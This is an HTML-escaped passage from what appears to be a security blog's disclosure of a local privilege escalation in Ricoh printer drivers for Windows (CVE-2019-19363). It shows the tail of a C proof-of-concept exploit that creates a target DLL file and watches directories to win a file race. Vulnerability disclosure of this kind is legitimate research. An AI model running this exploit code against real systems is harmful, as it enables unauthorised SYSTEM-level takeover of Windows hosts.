&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-163"&gt;&lt;code data-line-number="163"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-163" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-163"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-164"&gt;&lt;code data-line-number="164"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-164" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-164"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-165"&gt;&lt;code data-line-number="165"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-165" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-165"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-166"&gt;&lt;code data-line-number="166"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-166" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-166"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;lstrcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;lpszDirName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;BaseDirName&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-167"&gt;&lt;code data-line-number="167"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-167" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-167"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-168"&gt;&lt;code data-line-number="168"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-168" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-168"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hFile&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;CreateFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-169"&gt;&lt;code data-line-number="169"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-169" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-169"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;GENERIC_WRITE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-170"&gt;&lt;code data-line-number="170"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-170" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-170"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;FILE_SHARE_READ&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_SHARE_WRITE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_SHARE_DELETE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-171"&gt;&lt;code data-line-number="171"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-171" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-171"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-172"&gt;&lt;code data-line-number="172"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-172" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-172"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;CREATE_ALWAYS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-173"&gt;&lt;code data-line-number="173"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-173" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-173"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;FILE_ATTRIBUTE_NORMAL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-174"&gt;&lt;code data-line-number="174"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-174" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-174"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-175"&gt;&lt;code data-line-number="175"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-175" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-175"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ File %s created&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-176"&gt;&lt;code data-line-number="176"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-176" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-176"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hFile&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-177"&gt;&lt;code data-line-number="177"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-177" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-177"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-178"&gt;&lt;code data-line-number="178"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-178" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-178"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-179"&gt;&lt;code data-line-number="179"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-179" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-179"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ File %s could not be created&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-180"&gt;&lt;code data-line-number="180"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-180" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-180"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-181"&gt;&lt;code data-line-number="181"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-181" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-181"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-182"&gt;&lt;code data-line-number="182"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-182" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-182"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;CreateIoCompletionPort&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ULONG_PTR&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-183"&gt;&lt;code data-line-number="183"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-183" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-183"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ CreateIoCompletionPort() failed.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-184"&gt;&lt;code data-line-number="184"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-184" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-184"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-185"&gt;&lt;code data-line-number="185"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-185" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-185"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-186"&gt;&lt;code data-line-number="186"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-186" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-186"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-187"&gt;&lt;code data-line-number="187"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-187" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-187"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Press &amp;lt;q&amp;gt; to exit&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-188"&gt;&lt;code data-line-number="188"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-188" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-188"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-189"&gt;&lt;code data-line-number="189"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-189" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-189"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// Start watching&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-190"&gt;&lt;code data-line-number="190"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-190" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-190"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;WatchDirectories&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-191"&gt;&lt;code data-line-number="191"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-191" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-191"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-192"&gt;&lt;code data-line-number="192"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-192" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-192"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-193"&gt;&lt;code data-line-number="193"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-193" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-193"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-194"&gt;&lt;code data-line-number="194"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-194" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-194"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-195"&gt;&lt;code data-line-number="195"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-195" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-195"&gt;&lt;/a&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;/section&gt;
&lt;/section&gt;
&lt;section id="updates"&gt;
&lt;h2&gt;Updates&lt;/h2&gt;
